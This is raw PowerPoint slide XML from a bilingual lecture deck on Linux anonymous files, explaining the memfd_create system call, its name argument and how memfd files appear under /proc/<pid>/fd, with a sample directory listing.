            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19591988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102</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326467773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103</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226538808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104</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84373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732381" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The name supplied in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is used as a filename and will be displayed as the target of the corresponding symbolic link in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/self/</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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>displayed name is always prefixed with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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and serves only for debugging purposes. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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1431713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5496" y="2675467"/>
            <a:ext cx="9001000" cy="3574696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>total 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1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64 Mar 30 23:23 0 -&gt; /dev/pts/0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1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64 Mar 30 23:23 1 -&gt; /dev/pts/0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1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64 Mar 30 23:23 2 -&gt; /dev/pts/0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1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64 Mar 30 23:23 3 -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd:kittens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (deleted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>------ 1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 64 Mar 30 23:23 4 -&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: (deleted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>這個目錄包含了進程打開的每一個文件的鏈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itread01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>we see two anonymous files, one named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kittens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> and one without a name at all. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(deleted)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t>is inaccurate and looks a bit weird but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" err="1"/>
              <a:t>c’est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0"/>
              <a:t> la vie.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="22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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Anonymous File (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc/&lt;PID&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1001434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496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to provide an easy way to get a file-descriptor for anonymous memory, without requiring a local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tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> mount-point. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> takes 2 parameters, a name and a bunch of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>flags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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const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char *</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name</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unsigned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flags</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
